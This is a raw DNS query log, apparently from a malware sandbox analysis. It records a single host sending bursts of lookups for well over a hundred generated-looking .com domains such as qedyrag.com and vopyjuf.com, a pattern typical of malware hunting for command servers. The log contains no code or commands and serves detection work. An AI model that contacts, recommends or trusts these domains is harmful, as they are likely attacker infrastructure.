                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495157003 CET192.168.2.81.1.1.10x9f5Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495964050 CET192.168.2.81.1.1.10x8bfbStandard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.507450104 CET192.168.2.81.1.1.10x6a3dStandard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.508481026 CET192.168.2.81.1.1.10x1036Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.508667946 CET192.168.2.81.1.1.10x5730Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.521083117 CET192.168.2.81.1.1.10x1c3cStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.525666952 CET192.168.2.81.1.1.10x502dStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.587269068 CET192.168.2.81.1.1.10x106bStandard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.587917089 CET192.168.2.81.1.1.10xb2e4Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.588097095 CET192.168.2.81.1.1.10xe92Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.589493990 CET192.168.2.81.1.1.10x19efStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.589884043 CET192.168.2.81.1.1.10xdc6aStandard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.591134071 CET192.168.2.81.1.1.10xf0bStandard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.591998100 CET192.168.2.81.1.1.10xdd56Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.592411995 CET192.168.2.81.1.1.10x1688Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.602241993 CET192.168.2.81.1.1.10x8807Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.603147984 CET192.168.2.81.1.1.10x59c8Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623301029 CET192.168.2.81.1.1.10x3f76Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623369932 CET192.168.2.81.1.1.10xfafdStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623533010 CET192.168.2.81.1.1.10x8ffStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623577118 CET192.168.2.81.1.1.10xa065Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623707056 CET192.168.2.81.1.1.10x610fStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624531031 CET192.168.2.81.1.1.10x6c9eStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624706030 CET192.168.2.81.1.1.10x8ff2Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624861002 CET192.168.2.81.1.1.10xf2e2Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624995947 CET192.168.2.81.1.1.10xa875Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625155926 CET192.168.2.81.1.1.10x4575Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625315905 CET192.168.2.81.1.1.10x47bfStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625472069 CET192.168.2.81.1.1.10x6001Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625632048 CET192.168.2.81.1.1.10xdc91Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625782013 CET192.168.2.81.1.1.10x161eStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625936985 CET192.168.2.81.1.1.10xd6d9Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.626127005 CET192.168.2.81.1.1.10x42e6Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.636260033 CET192.168.2.81.1.1.10x1eaStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.641238928 CET192.168.2.81.1.1.10x26e8Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.642169952 CET192.168.2.81.1.1.10x9dbaStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.642348051 CET192.168.2.81.1.1.10x9ea4Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.643064022 CET192.168.2.81.1.1.10x6343Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647330046 CET192.168.2.81.1.1.10x4ecStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647490025 CET192.168.2.81.1.1.10xcc15Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647638083 CET192.168.2.81.1.1.10xb649Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.648025036 CET192.168.2.81.1.1.10x4596Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.650038958 CET192.168.2.81.1.1.10x11c7Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.848454952 CET192.168.2.81.1.1.10xa6d4Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:51.589240074 CET192.168.2.81.1.1.10x4ca9Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.579353094 CET192.168.2.81.1.1.10x6cc3Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.586690903 CET192.168.2.81.1.1.10x1bc3Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.596683025 CET192.168.2.81.1.1.10x46ebStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.607769966 CET192.168.2.81.1.1.10x5cb8Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.608661890 CET192.168.2.81.1.1.10x19ebStandard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.616175890 CET192.168.2.81.1.1.10xc542Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.625611067 CET192.168.2.81.1.1.10x1f3cStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.634088039 CET192.168.2.81.1.1.10xd156Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.634263039 CET192.168.2.81.1.1.10xe113Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.651223898 CET192.168.2.81.1.1.10x5967Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.677130938 CET192.168.2.81.1.1.10x6d83Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.718178034 CET192.168.2.81.1.1.10x807eStandard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.748466015 CET192.168.2.81.1.1.10xcfa1Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.766243935 CET192.168.2.81.1.1.10xd414Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767235994 CET192.168.2.81.1.1.10x6d75Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767908096 CET192.168.2.81.1.1.10x9eb5Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770308018 CET192.168.2.81.1.1.10x1646Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770662069 CET192.168.2.81.1.1.10x2e58Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121167898 CET192.168.2.81.1.1.10x2b35Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121611118 CET192.168.2.81.1.1.10x8b63Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121794939 CET192.168.2.81.1.1.10x5edcStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124286890 CET192.168.2.81.1.1.10xf757Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124547958 CET192.168.2.81.1.1.10x9085Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124799013 CET192.168.2.81.1.1.10x4e97Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124964952 CET192.168.2.81.1.1.10x1dd1Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125344992 CET192.168.2.81.1.1.10xd694Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125513077 CET192.168.2.81.1.1.10x29fStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.146256924 CET192.168.2.81.1.1.10xfbe0Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148139000 CET192.168.2.81.1.1.10xb96bStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148644924 CET192.168.2.81.1.1.10x8d99Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148873091 CET192.168.2.81.1.1.10xc91cStandard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.149293900 CET192.168.2.81.1.1.10x6250Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.149471998 CET192.168.2.81.1.1.10xdf60Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.159881115 CET192.168.2.81.1.1.10x5ec8Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.160115957 CET192.168.2.81.1.1.10xf601Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.160507917 CET192.168.2.81.1.1.10x8443Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.164937973 CET192.168.2.81.1.1.10x921cStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165186882 CET192.168.2.81.1.1.10xf9a4Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165635109 CET192.168.2.81.1.1.10xf5b1Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165906906 CET192.168.2.81.1.1.10x5910Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166157961 CET192.168.2.81.1.1.10x133dStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166404009 CET192.168.2.81.1.1.10xc6d6Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166570902 CET192.168.2.81.1.1.10x918bStandard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166949987 CET192.168.2.81.1.1.10x9292Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167104006 CET192.168.2.81.1.1.10x6630Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167370081 CET192.168.2.81.1.1.10xe56cStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167567968 CET192.168.2.81.1.1.10x507Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167823076 CET192.168.2.81.1.1.10x69ddStandard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.168941021 CET192.168.2.81.1.1.10x3115Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182235956 CET192.168.2.81.1.1.10xbe42Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182663918 CET192.168.2.81.1.1.10x7867Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182862997 CET192.168.2.81.1.1.10x1bdaStandard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.188446999 CET192.168.2.81.1.1.10x3de9Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.194978952 CET192.168.2.81.1.1.10x364aStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.195194006 CET192.168.2.81.1.1.10x130bStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.195895910 CET192.168.2.81.1.1.10x58c6Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.196404934 CET192.168.2.81.1.1.10xc74Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.886164904 CET192.168.2.81.1.1.10x8b63Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.886851072 CET192.168.2.81.1.1.10xd28Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.920212030 CET192.168.2.81.1.1.10x62d5Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.142472982 CET192.168.2.81.1.1.10x1096Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.142995119 CET192.168.2.81.1.1.10x7bb3Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144262075 CET192.168.2.81.1.1.10x49f2Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144752026 CET192.168.2.81.1.1.10x17d9Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144939899 CET192.168.2.81.1.1.10x6b65Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.145052910 CET192.168.2.81.1.1.10x90dbStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.146047115 CET192.168.2.81.1.1.10x2aafStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.146585941 CET192.168.2.81.1.1.10xc6b3Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.300460100 CET192.168.2.81.1.1.10x1936Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770462990 CET192.168.2.81.1.1.10xe4feStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770771980 CET192.168.2.81.1.1.10xb7e9Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770823956 CET192.168.2.81.1.1.10x9e5aStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.771269083 CET192.168.2.81.1.1.10x8c0Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.771766901 CET192.168.2.81.1.1.10x3aa0Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.776046991 CET192.168.2.81.1.1.10x12f7Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.801872969 CET192.168.2.81.1.1.10xbb9eStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.806886911 CET192.168.2.81.1.1.10x36adStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.811335087 CET192.168.2.81.1.1.10x15ecStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.812119007 CET192.168.2.81.1.1.10x82e9Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.812119007 CET192.168.2.81.1.1.10xfe47Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.827297926 CET192.168.2.81.1.1.10xe80bStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.827497959 CET192.168.2.81.1.1.10xc962Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.830363035 CET192.168.2.81.1.1.10xebb6Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.831289053 CET192.168.2.81.1.1.10xc521Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.835860968 CET192.168.2.81.1.1.10xf228Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.842432022 CET192.168.2.81.1.1.10x137dStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.846596956 CET192.168.2.81.1.1.10x88d5Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.857167959 CET192.168.2.81.1.1.10xb91bStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.861213923 CET192.168.2.81.1.1.10x48fStandard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.865056038 CET192.168.2.81.1.1.10xbba4Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.866230011 CET192.168.2.81.1.1.10xf2a0Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.866677999 CET192.168.2.81.1.1.10x9f2dStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.867872953 CET192.168.2.81.1.1.10x8c74Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.868402004 CET192.168.2.81.1.1.10x15e5Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.869740009 CET192.168.2.81.1.1.10x37a1Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.871570110 CET192.168.2.81.1.1.10x1ac3Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.872549057 CET192.168.2.81.1.1.10xe869Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.875861883 CET192.168.2.81.1.1.10xc6dcStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.877954960 CET192.168.2.81.1.1.10x1d76Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.878146887 CET192.168.2.81.1.1.10x3913Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.880343914 CET192.168.2.81.1.1.10x4f7aStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881010056 CET192.168.2.81.1.1.10xf43dStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881129026 CET192.168.2.81.1.1.10x77d9Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.545770884 CET192.168.2.81.1.1.10xf83bStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.547274113 CET192.168.2.81.1.1.10x126cStandard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.547509909 CET192.168.2.81.1.1.10xd912Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.549329996 CET192.168.2.81.1.1.10xda30Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.549791098 CET192.168.2.81.1.1.10x5edaStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.552922010 CET192.168.2.81.1.1.10x9e70Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.553375959 CET192.168.2.81.1.1.10xdd7fStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.554821014 CET192.168.2.81.1.1.10xe108Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.557312965 CET192.168.2.81.1.1.10x87bdStandard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.568737984 CET192.168.2.81.1.1.10x60e8Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.572643042 CET192.168.2.81.1.1.10xf262Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.573024988 CET192.168.2.81.1.1.10xa4c3Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.573024988 CET192.168.2.81.1.1.10xd79cStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.585411072 CET192.168.2.81.1.1.10xe6afStandard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.593684912 CET192.168.2.81.1.1.10x7e58Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595535994 CET192.168.2.81.1.1.10x28d2Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595712900 CET192.168.2.81.1.1.10xc15bStandard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595741987 CET192.168.2.81.1.1.10xba18Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595901012 CET192.168.2.81.1.1.10x6916Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595940113 CET192.168.2.81.1.1.10x4df3Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596086025 CET192.168.2.81.1.1.10xeb3dStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596117973 CET192.168.2.81.1.1.10xd236Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596263885 CET192.168.2.81.1.1.10x8c97Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596323967 CET192.168.2.81.1.1.10x9f6Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596431017 CET192.168.2.81.1.1.10x87aeStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596601009 CET192.168.2.81.1.1.10xa3f9Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596615076 CET192.168.2.81.1.1.10x18d7Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596771955 CET192.168.2.81.1.1.10x8e51Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596944094 CET192.168.2.81.1.1.10x82d4Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596998930 CET192.168.2.81.1.1.10xa9f2Standard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597146988 CET192.168.2.81.1.1.10x981cStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597188950 CET192.168.2.81.1.1.10x42e4Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597312927 CET192.168.2.81.1.1.10x7c76Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597387075 CET192.168.2.81.1.1.10x9ceaStandard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597511053 CET192.168.2.81.1.1.10x3df6Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
